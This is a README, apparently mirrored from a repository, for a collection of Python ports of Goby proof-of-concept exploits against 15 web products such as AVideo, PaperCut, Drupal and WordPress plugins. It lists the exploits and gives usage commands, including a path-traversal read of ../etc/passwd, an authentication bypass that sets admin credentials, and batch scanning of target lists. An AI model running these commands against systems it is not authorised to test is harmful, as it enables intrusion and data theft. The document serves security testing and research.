Share
## https://sploitus.com/exploit?id=5FB1AD36-08DF-5A3C-BDCB-6A23BC628313
# Goby POC Collection

> Convert Goby vulnerability scan tools’ POC/EXPs into Python-based implementations.
> Python implementations of Goby vulnerability POCs

## πŸ“‹ Vulnerability List (Total 15)

| # | Vulnerability Name | Type | CVE | Has EXP |
|---|-------------------------|------|--------|-------|
| 1 | [AVideo File Inclusion Vulnerability](./exploits/avideo_file_inclusion.py) | File Inclusion | CVE-2026-33513 | βœ… |
| 2 | [PaperCut NG/MF Permission Bypass Vulnerability](./exploits/papercut_auth_bypass.py) | Permission Bypass | CVE-2023-27351 | βœ… |
| 3 | [PowerJob SSRF Vulnerability](./exploits/powerjob_ssrf.py) | SSRF | CVE-2025-14518 | βœ… |
| 4 | [WordPress User Enumeration Permission Bypass](./exploits/wordpress_permission_bypass.py) | Permission Bypass | CVE-2025-4302 | βœ… |
| 5 | [Xinhu OA SQL Injection Blind Attack](./exploits/xinhu_oa_sqli_blind.py) | SQL Injection | CVE-2025-63742 | ❌ |
| 6 | [Sanhui SMG Gateway Information Disclosure Vulnerability](./exploits/sanhui_smg_info_disclosure.py) | Information Disclosure | - | βœ… |
| 7 | [AJ-Report Code Execution Vulnerability](./exploits/aj_report_code_execution.py) | Code Execution | CVE-2024-7314 | βœ… |
| 8 | [Drupal Core SQL Injection Vulnerability](./exploits/drupal_sqli.py) | SQL Injection | CVE-2026-9082 | βœ… |
| 9 | [Sobe Unauthorized Access Vulnerability](./exploits/sobey_unauthorized_access.py) | Unauthorized Access | - | βœ… |
| 10 | [Tiandi Easy7 SQL Injection Vulnerability](./exploits/tiandy_easy7_sqli.py) | SQL Injection | - | ❌ |
| 11 | [WordPress AJAX Load More Information Disclosure Vulnerability](./exploits/wordpress_ajax_load_more_info_disclosure.py) | Information Disclosure | CVE-2025-59582 | βœ… |
| 12 | [WordPress Easy Appointments Information Disclosure Vulnerability](./exploits/wordpress_easy_appointments_info_disclosure.py) | Information Disclosure | CVE-2026-2262 | βœ… |
| 13 | [WordPress Flippercode SQL Injection Vulnerability](./exploits/wordpress_flippercode_sqli.py) | SQL Injection | CVE-2026-6433 | βœ… |
| 14 | [WordPress WebStack File Upload Vulnerability](./exploits/wordpress_webstack_fileUpload.py) | File Upload | CVE-2026-1555 | βœ… |
| 15 | [XWiki Directory Traversal Vulnerability](./exploits/xwiki_directory_traversal.py) | Directory Traversal | CVE-2026-23734 | βœ… |

## πŸš€ Quick Usage

```bash
# Install dependencies
pip install -r requirements.txt

# Use a unified entry point
python run_poc.py check http://target.com:8080 --poc avideo_file_inclusion
python run_poc.py exploit http://target.com:8080 --poc avideo_file_inclusion --params '{"filePath":"../etc/passwd"}'

# Run individual POCs directly
python exploits/avideo_file_inclusion.py check http://target.com:8080
python exploits/papercut_auth_bypass.py exploit http://target.com:8080 --params '{"username":"admin","passwd":"Admin@123"}'

# Batch detection
python run_poc.py batch targets.txt --poc all
```

## πŸ“ Directory Structure

goby-pocs/  
β”œβ”€β”€ README.md                  # This file  
β”œβ”€β”€ requirements.txt           # Python dependencies  
β”œβ”€β”€ run_poc.py                 # Unified entry script  
β”œβ”€β”€ goby_poc.py                # POC base framework  
β”œβ”€β”€ exploits/  
β”‚   β”œβ”€β”€ avideo_file_inclusion.py              # AVideo file inclusion (CVE-2026-33513)  
β”‚   β”œβ”€β”€ papercut_auth_bypass.py               # PaperCut permission bypass (CVE-2023-27351)  
β”‚   β”œβ”€β”€ powerjob_ssrf.py                      # PowerJob SSRF (CVE-2025-14518)  
β”‚   β”œβ”€β”€ wordpress_permission_bypass.py        # WordPress permission bypass (CVE-2025-4302)  
β”‚   β”œβ”€β”€ xinhu_oa_sqli_blind.py                # Xinhu OA SQL blind injection (CVE-2025-63742)  
β”‚   β”œβ”€β”€ sanhui_smg_info_disclosure.py         # Sanhui SMG information disclosure  
β”‚   β”œβ”€β”€ aj_report_code_execution.py           # AJ-Report code execution (CVE-2024-7314)  
β”‚   β”œβ”€β”€ drupal_sqli.py                        # Drupal SQL injection (CVE-2026-9082)  
β”‚   β”œβ”€β”€ sobey_unauthorized_access.py          # Sobey unauthorized access  
β”‚   β”œβ”€β”€ tiandy_easy7_sqli.py                  # Tiandi Easy7 SQL injection  
β”‚   β”œβ”€β”€ wordpress_ajax_load_more_info_disclosure.py # WP Ajax Load More information disclosure (CVE-2025-59582)  
β”‚   β”œβ”€β”€ wordpress_easy_appointments_info_disclosure.py # WP Easy Appointments information disclosure (CVE-2026-2262)  
β”‚   β”œβ”€β”€ wordpress_flippercode_sqli.py         # WP FlipperCode SQL injection (CVE-2026-6433)  
β”‚   β”œβ”€β”€ wordpress_webstack_fileUpload.py     # WP WebStack file upload (CVE-2026-1555)  
β”‚   └── xwiki_directory_traversal.py          # XWiki directory traversal (CVE-2026-23734)  
  
## πŸ“– Information contained in each POC  
Each POC file is a **standalone executable** Python script, containing:  
1. **Vulnerability documentation** β€” Product name, vulnerability type, entry point, vulnerability mechanism, severity level  
2. **Detection logic** β€” `check()` method, returns whether the vulnerability exists  
3. **Exploitation logic** β€” `exploit()` method (if available), executes the vulnerability exploitation  
4. **Command-line entry** β€” Can be run directly  
  
## βš™οΈ How to use  
  
### Detecting a single target  
```bash
# Format: python exploits/.py check  
python exploits/powerjob_ssrf.py check http://192.168.1.100:7700  
```  
  
### Exploiting vulnerabilities  
```bash
# Format: python exploits/.py exploit [--params JSON]  
python exploits/avideo_file_inclusion.py exploit http://192.168.1.100:8080 --params '{"filePath":"../etc/passwd"}'  
python exploits/papercut_auth_bypass.py exploit http://192.168.1.100:9191 --params '{"username":"hacker","passwd":"Hacker@123"}'  
```  
  
### Batch detection  
```bash
# targets.txt: One target per line  
python run_poc.py batch targets.txt --poc powerjob_ssrf  
```  
  
## πŸ”’ Disclaimer  
This tool is for security research and authorized testing purposes only. Users must comply with relevant laws and regulations. Do not use it for illegal purposes.